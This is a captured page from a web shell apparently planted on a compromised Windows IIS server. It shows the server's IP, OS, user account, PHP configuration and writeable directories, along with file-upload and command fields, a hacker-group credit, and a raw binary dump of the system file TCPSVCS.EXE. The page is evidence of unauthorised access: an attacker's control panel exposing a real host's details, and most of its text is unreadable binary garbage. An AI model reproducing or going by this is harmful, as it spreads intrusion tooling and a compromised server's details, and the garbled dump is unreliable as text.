DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.127
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Windows/System32/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Windows/System32/TCPSVCS.EXE
MZ@	!L!This program cannot be run in DOS mode.

$%qDDD<D<D<DDD<D<D<DRichDPELb[J	50`?4@x@(Plh@xt.text  `.data0@.rsrc(@@@.relocP"@B~[J8[JE[JRo[J\[JR[JgADVAPI32.dllKERNEL32.dllNTDLL.DLLmsvcrt.dllRPCRT4.dllwswCw@kw~kw*wvwwww7w(wwwwPwDw#
wwvww(wB1w<wfw5+w^wwwwfo+oo'>oao'o'owooQo6ouoo7o(o\wpb[J$SimpTcp\TCPSVCS: Failed to start control dispatcher %lu
[TCPSVCS] SetServiceStatus error %ld
[TCPSVCS] RegisterServiceCtrlHandler failed %d
TCPSVCS: Can't find entry %s in DLL %ws: %ld
ServiceEntryTCPSVCS: Failed to load DLL %ws: %ld
TCPSVCS: Failed to get system directory: %ld
simptcp.dllx00H0RSDSxJM*=e^tcpsvcs.pdbBVW3V39=@0ujhjx@0V_^̋VW3V39=@0t
@0uW|utV_^̋Vh(3VVjV$h3 h05@0337uPh YYV̋Ueee3@huEEEE0EuPh|MQPuPhTZYY̋U003ʼnES]VW}hP8uVhYYVhVPmtSVPXP4u*P0uVSh됾VP,u'SVheS7h3WuЋM_^3[̋UuuhD]̋UVu3utу;ur^]̡h0hX05d0X0hH0hL0hD0T0jh3ۉ]dp]3SVW`;t;u3Fuhd3F3;u
jyY;3u,53hh#YYtE5`03;uhhYY39]uSWl93th3{Yt
SjS35H05L05D0{\09P0u7PE	MPQYYËeE\039P0uP9`0uE\0̸MZf9t3M<8PEuHtuՃv39xtv39jP0P
3
3YY
p0
l0q= 0uhY?3%;
0uh̋UE8csmu+xu%@= t=!t="t=@u3]hd\3%̋UMMZf9t3]ËA<8PEu3ҹf9H‹]̋UEH<ASVq3WDv}H;r	X;r
B(;r3_^[]jheV\Yt=E+PVYYt+@$ЃE E3=ËeE3e%%hBd5D$l$l$+SVW01E3PeuEEEEdËMd
Y__^[]Q̋UuuuuhOh0L]hhYY3jhL3MtDt?!EMZf9u+Q<|$s
E8PEt3@Ëe3EE?̋UjXt$Pt@\fujX]fu3@]ËE]̋U0eeSWN@;t
t	У0[VEPDu3uH3L3P3EPTE3E3;t0uO@50։50^_[̋U(x1
t1p1l15h1=d1f1f
1f`1f\1f%X1f-T11E|1E1E1010x0	|000j\h\hh	<P@%%/J X  t~`(>N`p!!!!!!l!X!:!!!"     j V *   8  StartServiceCtrlDispatcherWSetServiceStatusRegisterServiceCtrlHandlerWADVAPI32.dll9LeaveCriticalSectionEnterCriticalSectionExitProcessGetLastErrorInitializeCriticalSectionHeapSetInformationXSetErrorModeEGetProcAddress?LoadLibraryWGetModuleHandleWpGetSystemDirectoryWKERNEL32.dllPwcscat_s__getmainargs_cexitb_exitj_XcptFilterexit_initterm_amsg_exit__setusermatherr__p__commode__p__fmode__set_app_typemsvcrt.dll7?terminate@@YAXXZY_except_handler4_common'_controlfp DbgPrintntdll.dllRpcServerListenRpcMgmtWaitServerListenRpcMgmtStopServerListeningRPCRT4.dllInterlockedExchangeSleepInterlockedCompareExchangeSetUnhandledExceptionFilterGetModuleHandleAQueryPerformanceCounterGetTickCountGetCurrentThreadIdGetCurrentProcessIdyGetSystemTimeAsFileTimeTerminateProcessGetCurrentProcessUnhandledExceptionFilterN@D 8Ph		C@<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1"
 manifestVersion="1.0"> 

  <assemblyIdentity version="5.1.0.0"
     processorArchitecture="x86"
     name="Microsoft.Windows.Net.tcpsvcs"
     type="win32"/> 

  <description>tcpsvcs - Hosts the Simple TCP/IP services.</description> 

  <!-- Identify the application security requirements. -->

  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel
          level="asInvoker"
          uiAccess="false"/>
        </requestedPrivileges>
       </security>
  </trustInfo>

</assembly>
4VS_VERSION_INFO@@?StringFileInfo040904B0LCompanyNameMicrosoft Corporation`FileDescriptionTCP/IP Services Applicationl&FileVersion6.1.7600.16385 (win7_rtm.090713-1255)8InternalNameTCPSVCS.EXE.LegalCopyright Microsoft Corporation. All rights reserved.@OriginalFilenameTCPSVCS.EXEj%ProductNameMicrosoft Windows Operating SystemBProductVersion6.1.7600.16385DVarFileInfo$Translation	`000\2`22223	33"3)3<3E3K3S3\3h3q3333333333333334*444:4G4Q4W4w444444	555+535=5L5c555555555556 6)6D6N6a6k6p6u666666666666677767>7G7M7U7a7x7777777778888#8F8Q88888\9j9999:T:Y:x::::;];j;v;~;;;;;;;;;;;;;;<
<<<"<*<2<:<F<O<T<Z<d<m<x<<<<<<<<<<<<==000

Anon7 - 2022
AnonSec Team